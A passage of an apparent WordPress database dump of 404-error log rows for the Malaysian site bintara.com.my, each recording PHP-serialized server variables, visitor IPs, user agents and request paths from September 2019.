com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5SyXHYVBlg0Ecqvi9V4AAAAFQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569608393.3434\";s:12:\"REQUEST_TIME\";s:10:\"1569608393\";}}','notice','2019-09-27 18:20:30','2019-09-27 18:19:53',34445696,36247968,'https://bintara.com.my/blog/tag/logitech-rally/',1,0,'5.45.207.40'),(27255,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3452.0 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"92.127.155.231\";s:11:\"REMOTE_PORT\";s:5:\"48901\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5iuNs@3O4E744khfYG9AAAABE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569612472.9257\";s:12:\"REQUEST_TIME\";s:10:\"1569612472\";}}','notice','2019-09-27 19:27:56','2019-09-27 19:27:53',35519632,37320992,'https://bintara.com.my/?page_id=18',1,0,'92.127.155.231'),(27256,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/author/admin/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/author/admin/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY5p@pB8LtYU@MYZI46nkQAAARA\";s:12:\"REDIRECT_URL\";s:14:\"/author/admin/\";s:11:\"REMOTE_ADDR\";s:13:\"101.51.141.20\";s:11:\"REMOTE_PORT\";s:5:\"41457\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/author/admin/\";s:10:\"SCRIPT_URL\";s:14:\"/author/admin/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY5p@pB8LtYU@MYZI46nkQAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569614331.0386\";s:12:\"REQUEST_TIME\";s:10:\"1569614331\";}}','notice','2019-09-27 19:58:53','2019-09-27 19:58:51',35623456,37424672,'https://bintara.com.my/author/admin/',1,0,'101.51.141.20'),(27257,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20100101 Firefox/60.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"54.36.175.37\";s:11:\"REMOTE_PORT\";s:5:\"54144\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY52vNs@3O4E744khfYOMgAAABQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569617596.7297\";s:12:\"REQUEST_TIME\";s:10:\"1569617596\";}}','notice','2019-09-27 20:53:19','2019-09-27 20:53:17',35519568,37323616,'https://bintara.com.my/?page_id=18',1,0,'54.36.175.37'),(27258,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3315.3 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"66.55.155.44\";s:11:\"REMOTE_PORT\";s:5:\"54180\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY533ts@3O4E744khfYOwgAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569617886.7907\";s:12:\"REQUEST_TIME\";s:10:\"1569617886\";}}','notice','2019-09-27 20:58:08','2019-09-27 20:58:07',35126832,36935824,'https://bintara.com.my/?page_id=18',1,0,'66.55.155.44'),(27259,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:34:\"https://bintara.com.my/?page_id=18\";s:15:\"HTTP_USER_AGENT\";s:131:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.51\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:10:\"5.188.84.6\";s:11:\"REMOTE_PORT\";s:5:\"53911\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY6LKaTYgRwQdJ@9I7Ba5QAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569622826.058\";s:12:\"REQUEST_TIME\";s:10:\"1569622826\";}}','notice','2019-09-27 22:20:28','2019-09-27 22:20:26',35603728,37411384,'https://bintara.com.my/?page_id=18',1,0,'5.188.84.6'),(27260,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:55:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:66:\"/wp-content/plugins/wp-testimonial-widget/js/media-lib-uploader.js\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:23:\"en-US,en;q=0.8,ru;q=0.6\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:88:\"https://bintara.com.my/wp-content/plugins/wp-testimonial-widget/js/media-lib-uploader.js\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:66:\"/wp-content/plugins/wp-testimonial-widget/js/media-lib-uploader.js\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY6dU3HYVBlg0Ecqvi9juQAAAEs\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:88:\"https://bintara.com.my/wp-content/plugins/wp-testimonial-widget/js/media-lib-uploader.js\";s:19:\"REDIRECT_SCRIPT_URL\";s:66:\"/wp-content/plugins/wp-testimonial-widget/js/media-lib-uploader.js\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY6dU3HYVBlg0Ecqvi9juQAAAEs\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:14:\"185.107.47.171\";s:11:\"REMOTE_PORT\";s:5:\"17288\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:88:\"https://bintara.com.my/wp-content/plugins/wp-testimonial-widget/js/media-lib-uploader.js\";s:10:\"SCRIPT_URL\";s:66:\"/wp-content/plugins/wp-testimonial-widget/js/media-lib-uploader.js\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY6dU3HYVBlg0Ecqvi9juQAAAEs\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569627475.3095\";s:12:\"REQUEST_TIME\";s:10:\"1569627475\";}}','notice','2019-09-27 23:37:58','2019-09-27 23:37:55',35853440,37652832,'https://bintara.com.my/wp-content/plugins/wp-testimonial-widget/js/media-lib-uploader.js',1,0,'185.107.47.171'),(27261,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:55:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:52:\"/wp-content/plugins/wp-testimonial-widget/readme.txt\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:23:\"en-US,en;q=0.8,ru;q=0.6\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:55:\"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:74:\"https://bintara.com.my/wp-content/plugins/wp-testimonial-widget/readme.txt\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:52:\"/wp-content/plugins/wp-testimonial-widget/readme.txt\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XY6dVaTYgRwQdJ@9I7BdMAAAAJE\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:74:\"https://bintara.com.my/wp-content/plugins/wp-testimonial-widget/readme.txt\";s:19:\"REDIRECT_SCRIPT_URL\";s:52:\"/wp-content/plugins/wp-testimonial-widget/readme.txt\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY6dVaTYgRwQdJ@9I7BdMAAAAJE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:13:\"92.62.139.103\";s:11:\"REMOTE_PORT\";s:5:\"57008\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:74:\"https://bintara.com.my/wp-content/plugins/wp-testimonial-widget/readme.txt\";s:10:\"SCRIPT_URL\";s:52:\"/wp-content/plugins/wp-testimonial-widget/readme.txt\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY6dVaTYgRwQdJ@9I7BdMAAAAJE\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569627477.4025\";s:12:\"REQUEST_TIME\";s:10:\"1569627477\";}}','notice','2019-09-27 23:37:59','2019-09-27 23:37:57',35441608,37244944,'https://bintara.com.my/wp-content/plugins/wp-testimonial-widget/readme.txt',1,0,'92.62.139.103'),(27262,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/ptz-pro/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/ptz-pro/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/ptz-pro/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XY6fVXHYVBlg0Ecqvi9kqAAAAFI\";s:12:\"REDIRECT_URL\";s:9:\"/ptz-pro/\";s:11:\"REMOTE_ADDR\";s:13:\"40.77.167.100\";s:11:\"REMOTE_PORT\";s:5:\"11726\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/ptz-pro/\";s:10:\"SCRIPT_URL\";s:9:\"/ptz-pro/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XY6fVXHYVBlg0Ecqvi9kqAAAAFI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569627989.8666\";s:12:\"REQUEST_TIME\";s:10:\"1569627989\";}}','notice','2019-09-27 23:46:31','2019-09-27 23:46:30',34053336,35856696,'https://bintara.com.my/ptz-pro/',1,0,'40.77.167.100'),(27263,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.92 Safari/537.36 